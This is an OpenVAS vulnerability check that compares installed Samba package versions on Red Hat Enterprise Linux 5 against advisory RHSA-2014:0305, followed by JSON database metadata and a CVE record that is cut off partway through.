ID OPENVAS:871144 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2017-07-12T00:00:00
Description
Check for the Version of samba
###############################################################################
# OpenVAS Vulnerability Test
#
# RedHat Update for samba RHSA-2014:0305-01
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
if(description)
{
script_id(871144);
script_version("$Revision: 6688 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-12 11:49:31 +0200 (Wed, 12 Jul 2017) $");
script_tag(name:"creation_date", value:"2014-03-20 09:55:45 +0530 (Thu, 20 Mar 2014)");
script_cve_id("CVE-2013-0213", "CVE-2013-0214", "CVE-2013-4124");
script_tag(name:"cvss_base", value:"5.1");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_name("RedHat Update for samba RHSA-2014:0305-01");
tag_insight = "Samba is an open-source implementation of the Server Message Block (SMB) or
Common Internet File System (CIFS) protocol, which allows PC-compatible
machines to share files, printers, and other information.
It was discovered that the Samba Web Administration Tool (SWAT) did not
protect against being opened in a web page frame. A remote attacker could
possibly use this flaw to conduct a clickjacking attack against SWAT users
or users with an active SWAT session. (CVE-2013-0213)
A flaw was found in the Cross-Site Request Forgery (CSRF) protection
mechanism implemented in SWAT. An attacker with the knowledge of a victim's
password could use this flaw to bypass CSRF protections and conduct a CSRF
attack against the victim SWAT user. (CVE-2013-0214)
An integer overflow flaw was found in the way Samba handled an Extended
Attribute (EA) list provided by a client. A malicious client could send a
specially crafted EA list that triggered an overflow, causing the server to
loop and reprocess the list using an excessive amount of memory.
(CVE-2013-4124)
Note: This issue did not affect the default configuration of the Samba
server.
Red Hat would like to thank the Samba project for reporting CVE-2013-0213
and CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter
of CVE-2013-0213 and CVE-2013-0214.
All users of Samba are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing this
update, the smb service will be restarted automatically.
";
tag_affected = "samba on Red Hat Enterprise Linux (v. 5 server)";
tag_solution = "Please Install the Updated Packages.";
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name: "RHSA", value: "2014:0305-01");
script_xref(name: "URL" , value: "https://www.redhat.com/archives/rhsa-announce/2014-March/msg00024.html");
script_summary("Check for the Version of samba");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
script_family("Red Hat Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/rhel", "ssh/login/rpms");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "RHENT_5")
{
if ((res = isrpmvuln(pkg:"libsmbclient", rpm:"libsmbclient~3.0.33~3.40.el5_10", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"libsmbclient-devel", rpm:"libsmbclient-devel~3.0.33~3.40.el5_10", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"samba", rpm:"samba~3.0.33~3.40.el5_10", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"samba-client", rpm:"samba-client~3.0.33~3.40.el5_10", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"samba-common", rpm:"samba-common~3.0.33~3.40.el5_10", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"samba-debuginfo", rpm:"samba-debuginfo~3.0.33~3.40.el5_10", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"samba-swat", rpm:"samba-swat~3.0.33~3.40.el5_10", rls:"RHENT_5")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:871144", "type": "openvas", "bulletinFamily": "scanner", "title": "RedHat Update for samba RHSA-2014:0305-01", "description": "Check for the Version of samba", "published": "2014-03-20T00:00:00", "modified": "2017-07-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=871144", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["2014:0305-01", "https://www.redhat.com/archives/rhsa-announce/2014-March/msg00024.html"], "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "lastseen": "2017-07-27T10:48:40", "viewCount": 1, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-07-27T10:48:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4124", "CVE-2013-0213", "CVE-2013-0214"]}, {"type": "centos", "idList": ["CESA-2014:0305", "CESA-2013:1542", "CESA-2013:1310"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0305", "ELSA-2013-1310", "ELSA-2013-1542"]}, {"type": "redhat", "idList": ["RHSA-2013:1542", "RHSA-2014:0305", "RHSA-2013:1543", "RHSA-2013:1310"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2013-1542.NASL", "ORACLELINUX_ELSA-2014-0305.NASL", "ORACLELINUX_ELSA-2013-1542.NASL", "CENTOS_RHSA-2014-0305.NASL", "CENTOS_RHSA-2013-1542.NASL", "SL_20131121_SAMBA_ON_SL6_X.NASL", "SL_20130930_SAMBA3X_ON_SL5_X.NASL", "REDHAT-RHSA-2013-1310.NASL", "ORACLELINUX_ELSA-2013-1310.NASL", "SL_20140317_SAMBA_ON_SL5_X.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:871072", "OPENVAS:871042", "OPENVAS:1361412562310871072", "OPENVAS:1361412562310123523", "OPENVAS:1361412562310881903", "OPENVAS:881903", "OPENVAS:1361412562310871144", "OPENVAS:1361412562310123447", "OPENVAS:1361412562310871042", "OPENVAS:1361412562310123558"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29692", "SECURITYVULNS:DOC:29727"]}, {"type": "fedora", "idList": ["FEDORA:6B41920ABC", "FEDORA:2117B212DF", "FEDORA:18D6B2296A", "FEDORA:095C220955", "FEDORA:A0D702183C", "FEDORA:CAF3520AEF", "FEDORA:996EA20BEE"]}, {"type": "seebug", "idList": ["SSV:81370", "SSV:60939"]}, {"type": "suse", "idList": ["SUSE-SU-2013:0325-1", "SUSE-SU-2013:0326-1", "SUSE-SU-2013:0519-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2617-1:6509D"]}, {"type": "ubuntu", "idList": ["USN-2922-1"]}, {"type": "samba", "idList": ["SAMBA:CVE-2013-0214"]}, {"type": "exploitdb", "idList": ["EDB-ID:27778"]}], "modified": "2017-07-27T10:48:40", "rev": 2}, "vulnersScore": 7.4}, "pluginID": "871144", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2014:0305-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871144);\n script_version(\"$Revision: 6688 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:49:31 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 09:55:45 +0530 (Thu, 20 Mar 2014)\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for samba RHSA-2014:0305-01\");\n\n tag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\n\";\n\n tag_affected = \"samba on Red Hat Enterprise Linux (v. 5 server)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2014:0305-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2014-March/msg00024.html\");\n script_summary(\"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "naslFamily": "Red Hat Local Security Checks"}
{"cve": [{"lastseen": "2020-10-03T12:46:03", "description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before 4.0.8 allows remote attackers to cause a denial of service (memory consumption) via a malformed packet.", "edition": 3, "cvss3": {}, "published": "2013-08-06T02:56:00", "title": "CVE-2013-4124", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4124"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:samba:samba:4.0.6", "cpe:/a:samba:samba:3.0.6", "cpe:/a:samba:samba:3.0.16", "cpe:/a:samba:samba:3.2.14", "cpe:/o:fedoraproject:fedora:18", "cpe:/a:samba:samba:3.4.1", "cpe:/a:samba:samba:3.5.17", "cpe:/a:samba:samba:3.3.9", "cpe:/a:samba:samba:3.0.23", "cpe:/a:samba:samba:3.4.0", "cpe:/a:samba:samba:3.6.13", "cpe:/a:samba:samba:3.2.9", "cpe:/a:samba:samba:3.3.13", "cpe:/a:samba:samba:3.5.11", "cpe:/a:samba:samba:3.2.11", "cpe:/a:samba:samba:3.3.6", "cpe:/a:samba:samba:3.1.0", "cpe:/o:redhat:enterprise_linux:5", "cpe:/a:samba:samba:4.0.4", "cpe:/a:samba:samba:3.5.13", "cpe:/a:samba:samba:3.0.30", "cpe:/a:samba:samba:3.5.12", "cpe:/a:samba:samba:3.3.2", "cpe:/a:samba:samba:3.4.9", "cpe:/o:fedoraproject:fedora:19", "cpe:/a:samba:samba:3.2.15", "cpe:/a:samba:samba:3.0.21c", "cpe:/a:samba:samba:3.0.11", "cpe:/a:samba:samba:3.4.16", "cpe:/a:samba:samba:3.4.12", "cpe:/a:samba:samba:3.0.21b", "cpe:/a:samba:samba:3.6.7", "cpe:/a:samba:samba:3.0.26a", "cpe:/a:samba:samba:3.4.14", "cpe:/a:samba:samba:3.0.23d", "cpe:/a:samba:samba:3.4.15", "cpe:/a:samba:samba:3.5.19", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/a:samba:samba:3.4.5", "cpe:/a:samba:samba:3.0.21", "cpe:/a:samba:samba:3.0.9", "cpe:/a:samba:samba:4.0.3", "cpe:/a:samba:samba:3.3.3", "cpe:/a:samba:samba:3.0.20b", "cpe:/a:samba:samba:3.2.10", "cpe:/a:samba:samba:3.5.15", "cpe:/a:samba:samba:3.2.8", "cpe:/a:samba:samba:3.2.5", "cpe:/a:samba:samba:3.0.35", "cpe:/a:samba:samba:3.0.10", "cpe:/a:samba:samba:3.4.8", "cpe:/a:samba:samba:3.4.13", "cpe:/a:samba:samba:3.3.4", "cpe:/a:samba:samba:3.3.1", "cpe:/a:samba:samba:3.3.16", "cpe:/a:samba:samba:3.0.37", "cpe:/a:samba:samba:4.0.2", "cpe:/a:samba:samba:4.0.7", "cpe:/a:samba:samba:3.0.15", "cpe:/a:samba:samba:3.6.2", "cpe:/a:samba:samba:3.6.14", "cpe:/a:samba:samba:3.5.2", "cpe:/a:samba:samba:3.2.13", "cpe:/a:samba:samba:3.0.24", "cpe:/a:samba:samba:3.5.21", "cpe:/a:samba:samba:3.6.12", "cpe:/a:samba:samba:3.4.10", "cpe:/a:samba:samba:3.0.25c", "cpe:/a:samba:samba:3.4.6", "cpe:/a:samba:samba:3.2.1", "cpe:/a:samba:samba:3.6.10", "cpe:/a:samba:samba:3.0.34", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.6.9", "cpe:/a:samba:samba:3.0.7", "cpe:/a:samba:samba:3.6.0", "cpe:/a:samba:samba:3.3.0", "cpe:/a:samba:samba:3.0.0", "cpe:/a:samba:samba:3.0.20", "cpe:/a:samba:samba:3.0.25a", "cpe:/a:samba:samba:3.0.1", "cpe:/a:samba:samba:3.0.22", "cpe:/a:samba:samba:3.6.11", "cpe:/a:samba:samba:3.3.5", "cpe:/a:samba:samba:3.0.23b", "cpe:/a:samba:samba:3.3.11", "cpe:/a:samba:samba:3.0.29", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/a:samba:samba:3.4.3", "cpe:/a:samba:samba:3.2.2", "cpe:/a:samba:samba:4.0.1", "cpe:/a:samba:samba:3.0.23a", "cpe:/a:samba:samba:3.0.4", "cpe:/a:samba:samba:3.2.0", "cpe:/a:samba:samba:3.5.14", "cpe:/a:samba:samba:3.4.4", "cpe:/a:samba:samba:3.6.1", "cpe:/a:samba:samba:3.3.15", "cpe:/a:samba:samba:3.0.5", "cpe:/a:samba:samba:3.2.4", "cpe:/a:samba:samba:3.3.14", "cpe:/a:samba:samba:3.5.20", "cpe:/a:samba:samba:3.6.3", "cpe:/a:samba:samba:3.6.8", "cpe:/a:samba:samba:3.0.26", "cpe:/a:samba:samba:4.0.5", "cpe:/a:samba:samba:3.4.17", "cpe:/a:samba:samba:3.6.6", "cpe:/a:samba:samba:3.0.14a", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/a:samba:samba:3.5.10", "cpe:/a:samba:samba:3.2.7", "cpe:/a:samba:samba:3.6.16", "cpe:/a:samba:samba:3.3.12", "cpe:/o:canonical:ubuntu_linux:13.04", "cpe:/a:samba:samba:3.0.8", "cpe:/a:samba:samba:3.6.4", "cpe:/o:opensuse:opensuse:12.2", "cpe:/a:samba:samba:3.6.15", "cpe:/a:samba:samba:3.5.16", "cpe:/a:samba:samba:3.5.0", "cpe:/a:samba:samba:3.0.21a", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.14", "cpe:/a:samba:samba:3.2.6", "cpe:/a:samba:samba:3.0.19", "cpe:/a:samba:samba:3.0.2a", "cpe:/a:samba:samba:3.3.8", "cpe:/a:samba:samba:3.4.7", "cpe:/a:samba:samba:3.0.12", "cpe:/a:samba:samba:3.0.23c", "cpe:/a:samba:samba:3.0.27", "cpe:/a:samba:samba:3.0.25", "cpe:/a:samba:samba:3.0.36", "cpe:/a:samba:samba:3.4.11", "cpe:/a:samba:samba:3.0.33", "cpe:/a:samba:samba:3.0.18", "cpe:/a:samba:samba:4.0.0", "cpe:/a:samba:samba:3.0.13", "cpe:/a:samba:samba:3.6.5", "cpe:/a:samba:samba:3.0.20a", "cpe:/a:samba:samba:3.0.17", "cpe:/a:samba:samba:3.5.1", "cpe:/a:samba:samba:3.3.7", "cpe:/a:samba:samba:3.0.28", "cpe:/o:opensuse:opensuse:12.3", "cpe:/a:samba:samba:3.5.18", "cpe:/a:samba:samba:3.2.3", "cpe:/a:samba:samba:3.0.25b", "cpe:/a:samba:samba:3.0.32", "cpe:/a:samba:samba:3.2.12", "cpe:/a:samba:samba:3.3.10", "cpe:/a:samba:samba:3.4.2", "cpe:/a:samba:samba:3.0.31"], "id": "CVE-2013-4124", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4124", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:samba:samba:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:a:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23d:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:lts:*:*:*", "cpe:2.3:a:samba:samba:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:13.04:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.16:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:c:*:*:*:*:*:*", 